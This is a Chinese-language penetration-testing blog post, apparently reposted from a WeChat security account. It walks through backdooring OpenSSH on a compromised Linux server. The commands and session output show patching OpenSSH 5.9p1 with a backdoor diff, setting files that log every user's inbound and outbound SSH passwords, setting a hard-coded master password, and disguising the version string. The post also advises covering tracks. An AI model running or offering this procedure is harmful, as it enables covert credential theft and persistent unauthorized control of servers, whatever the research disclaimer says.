-
openssh介绍
OpenSSH是SSH(Secure Shell)协议的免费开源实现。很多人误认为OpenSSH与OpenSSL有关联,但实际上这两个计划有不同的目的和不同的发展团队,名称相近只是因为两者有同样的发展目标──提供开放源代码的加密通信软件。
OpenSSH是OpenBSD的子计划,其官方网站地址为http://www.openssh.com/。OpenSSH的各个版本可以到其官网下载。 -
利用过程
Linux操作系统的密码较难获取。而很多Linux服务器都配置了Openssh服务,在获取root权限的情况下,可以通过修改或者更新OpenSSH代码等方法,截取并保存其SSH登录账号密码,甚至可以留一个隐形的后门,达到长期控制linux服务器的目的。在很多Linux系统被入侵后都会在系统中留后门,使用OpenSSH留后门是入侵者的惯用方式之一。
ssh -V 查看版本
yum -y install openssl openssl-devel pam-devel zlib zlib-devel
安装依赖
准备安装
[ ]
OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013
[ ]
openssh-5.9p1.patch.tar.gz openssh-5.9p1.tar.gz
解压
[ ]
[ ]
[ ]
[ ]
openssh-5.9p1 openssh-5.9p1.patch openssh-5.9p1.patch.tar.gz openssh-5.9p1.tar.gz
给openssh打补丁
[root@DaMoWang opt]# cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1
[root@DaMoWang opt]# which patch
/usr/bin/which: no patch in (/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin)
[root@DaMoWang opt]# yum install patch
[root@DaMoWang opt]# cd /opt/openssh-5.9p1
[root@DaMoWang openssh-5.9p1]# patch < sshbd5.9p1.diff # 打补丁就是修改替换原文件
patching file auth.c
patching file auth-pam.c
patching file auth-passwd.c
patching file canohost.c
patching file includes.h
patching file log.c
patching file servconf.c
patching file sshconnect2.c
patching file sshlogin.c
patching file version.h
添加后门密码
[root@DaMoWang openssh-5.9p1]# vim includes.h
跳转到配置文件末尾处 , 修改默认配置
define ILOG "/tmp/ilog" # 记录远程登录本机的用户和密码
define OLOG "/tmp/olog" # 记录本机远程登录到其他主机的用户和密码
define SECRETPW "apaajaboleh" # 后门密码
修改版本号
[ ]
编译安装
[root@DaMoWang openssh-5.9p1]# ./configure --prefix=/usr
--sysconfdir=/etc/ssh
--with-pam
--with-kerberos5
&& make && make install
重启ssh服务 测试一下
[root@DaMoWang openssh-5.9p1]# service sshd restart
停止 sshd:[确定]
正在启动 sshd:[确定]
[root@DaMoWang openssh-5.9p1]# ssh -V
OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 201
服务正常启动 , 版本也与原版本一致
测试是否能劫持用户密码
首先测试远程登录本机
现在并没有生成文件
用xshell远程连接一下
用户名和密码被劫持 , 不仅仅是root用户 , 所有远程连接本机的用户都会被记录
测试后面密码能否登录本机
为了看到效果 使用明文密码登录
连接以后 别留下脚印
[ ]
[ ]
[ ]
[ ]
[ ]
原文始发于微信公众号(Pik安全实验室):[渗透思路] 利用Openssh后门 劫持root密码
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论